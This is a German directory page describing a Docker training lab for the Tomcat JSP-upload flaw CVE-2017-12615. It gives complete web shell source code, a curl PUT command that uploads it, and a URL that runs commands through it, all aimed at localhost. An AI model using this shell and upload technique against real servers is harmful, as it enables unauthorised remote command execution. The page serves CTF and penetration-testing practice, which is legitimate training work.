Skip to content
KitploitKITPLOIT
ToolsBlog
Log in
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2017-12615-Home-Lab — CVE-2017-12615 Tomcat: Remote-Code-Ausführung über JSP-Upload Heimlabor für Red Teaming, Penetrationstests | Kitploit
Tools/GitHubGitHub/netw0rk7/cve-2017-12615-home-lab
SchwachstellenanalyseExploitationWebanwendungs-ExploitationCTFPenetrationstestsLernen & BildungRed TeamingLabs & Praxis
GitHubnetw0rk7/cve-2017-12615-home-lab

CVE-2017-12615-Home-Lab

CVE-2017-12615 Tomcat: Remote-Code-Ausführung über JSP-Upload Heimlabor für Red Teaming, Penetrationstests

Repository anzeigen
7vor 10 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2017-12615 Tomcat: Remote-Code-Ausführung durch JSP-Upload

image

Dieses Labor simuliert die Schwachstelle CVE-2017-12615 Tomcat: Remote Code Execution via JSP Upload
Sie entsteht durch die Einstellung readonly=false, die das Hochladen von Dateien über HTTP PUT ermöglicht, einschließlich .jsp-Dateien, die Befehle ausführen können (RCE).


image

Funktionen

  • Apache Tomcat 7.0.79 (anfällig)
  • Verwendet DefaultServlet-Override mit readonly=false
  • Ermöglicht PUT-Upload zum Ablegen von .jsp-Dateien im ROOT-Webverzeichnis
  • Unterstützt die Ausführung von Befehlen über eine Web-Shell
  • Industrial-Webseite mit einem vergessenen internen Hinweis (Hint)
  • Automatische Generierung von flag_RANDOM.txt bei jedem Containerstart
  • Entwickelt für CTF / Red Team / Pentest Training

Verzeichnisstruktur

/opt/apache-tomcat-7.0.79/
/opt/apache-tomcat-7.0.79/webapps/ROOT/index.jsp
/opt/apache-tomcat-7.0.79/webapps/ROOT/WEB-INF/web.xml
/tmp/flag_RANDOM.txt
/docker-entrypoint.sh

Verwendung (Container starten)

docker compose build
docker compose up -d

Webseite öffnen:

http://localhost:8080/

Testen der Schwachstelle CVE-2017-12615

1) JSP-Payload-Datei erstellen

cat > shell.jsp << 'EOF'
<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
if (cmd != null) {
    String s;
    Process p = Runtime.getRuntime().exec(cmd);
    BufferedReader r = new BufferedReader(new InputStreamReader(p.getInputStream()));
    while ((s = r.readLine()) != null) out.println(s + "<br>");
}
%>
EOF

2) Datei mit PUT hochladen (erfordert / am Ende des Dateinamens)

curl -v -X PUT "http://localhost:8080/shell.jsp/"   -H "Content-Type: text/plain"   --data-binary @shell.jsp

3) Webshell aufrufen

http://localhost:8080/shell.jsp?cmd=id

Flag

Gespeichert in:

/tmp/flag_RANDOM.txt

Englische Version — CVE-2017-12615 Tomcat: Remote Code Execution via JSP Upload

Dieses Labor simuliert CVE-2017-12615 Tomcat: Remote Code Execution via JSP Upload, bei dem der DefaultServlet von Apache Tomcat falsch konfiguriert ist mit:

readonly=false

Dies ermöglicht Angreifern, .jsp-Dateien über HTTP PUT hochzuladen, was eine Remote-Code-Ausführung ermöglicht.


image

Funktionen

  • Anfälliger Apache Tomcat 7.0.79
  • DefaultServlet-Override mit readonly=false
  • PUT-Upload → beliebige .jsp-Dateien in das ROOT-Webverzeichnis schreiben
  • Unterstützt Befehlsausführung über die JSP-Shell
  • Industrial-Startseite mit einem dezenten internen Hinweis
  • Automatisch generierte flag_RANDOM.txt beim Containerstart
  • Geeignet für CTF, Forschung und Exploit-Entwicklung

Ausnutzungsbeispiel

Hochladen einer JSP-Shell

curl -v -X PUT "http://localhost:8080/shell.jsp/"   -H "Content-Type: text/plain"   --data-binary @shell.jsp

Befehle ausführen

http://localhost:8080/shell.jsp?cmd=id

Flag-Speicherort

/tmp/flag_RANDOM.txt

Haftungsausschluss

Nur zu Bildungs-, Forschungs- und autorisierten Penetrationstests.

Tool herunterladen